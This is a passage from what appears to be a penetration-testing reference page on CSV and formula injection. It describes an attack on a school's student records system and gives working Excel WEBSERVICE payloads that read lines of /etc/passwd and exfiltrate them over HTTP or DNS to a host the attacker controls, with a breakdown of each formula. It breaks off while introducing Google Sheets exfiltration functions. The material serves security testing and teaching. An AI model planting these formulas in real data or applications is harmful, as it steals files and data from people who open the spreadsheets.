If your **input** is being **reflected** inside **CSV file**s \(or any other file that is probably going to be opened by **Excel**\), you maybe able to put Excel **formulas** that will be **executed** when the user **opens the file** or when the user **clicks on some link** inside the excel sheet.
{% hint style="danger" %}
Nowadays **Excel will alert** \(several times\) the **user when something is loaded from outside the Excel** in order to prevent him to from malicious action. Therefore, special effort on Social Engineering must be applied to he final payload.
{% endhint %}
## Hyperlink
**The following example is very useful to exfiltrate content from the final excel sheet and to perform requests to arbitrary locations. But it requires the use to click on the link \(and accept the warning prompts\).**
Example taken from [https://payatu.com/csv-injection-basic-to-exploit](https://payatu.com/csv-injection-basic-to-exploit)
Let us assume an attack scenario of Student Record Management system of a school. The application allows teacher to enter details of students in the school. The attacker get access to the application and want that all the teacher using the application to get compromised. So the attacker tries to perform CSV injection attack through the web application.
The attacker need to steal other student’s details. So the attacker uses the Hyperlink formula ad enter it while entering student details.
* Ex-filtrate more than one line: `=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))`
* DNS Exfiltration: `=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),"."))`
**Analyzing the DNS ex-filtration payload:**
*‘file:///etc/passwd’\#$passwd.A19 – Will read the 19th line from the local /etc/passwd file
* ENCODEURL\(‘file:///etc/passwd’\#$passwd.A19\) – URL encode the returned data
* MID\(\(ENCODEURL\(‘file:///etc/passwd’\#$passwd.A19\)\),1,41\) – Similar to substring, read data from 1st character to 41st – a very handy way to restrict the length of DNS hostnames \(254 character limit on FQDN and 63 characters for a label, i.e. subdomain\)
* SUBSTITUTE\(MID\(\(ENCODEURL\(‘file:///etc/passwd’\#$passwd.A19\)\),1,41\),”%”,”-“\) – replace all instances of % \(the special character from URL encoding\) with dash – this is ensure that only valid DNS characters are used
* CONCATENATE\(\(SUBSTITUTE\(MID\(\(ENCODEURL\(‘file:///etc/passwd’\#$passwd.A19\)\),1,41\),”%”,”-“\)\),”.<FQDN>”\) – Concatenate the output from the file \(after the above processing has taken place\) with the FQDN \(for which we have access to the host that is authoritative for the domain\)
* WEBSERVICE – Will make a request for this non-existent DNS name which we can then parse the logs \(or run tcpdump etc.\) on the DNS authoritative name server for which we have control
## Google Sheets OOB Data Exfiltration
Firstly, let’s introduce some of the more interesting functions.
**CONCATENATE**: Appends strings to one another.
```text
=CONCATENATE(A2:E2)
```
**IMPORTXML**: Imports data from various structured data types including XML, HTML, CSV, TSV, and RSS and ATOM XML feeds.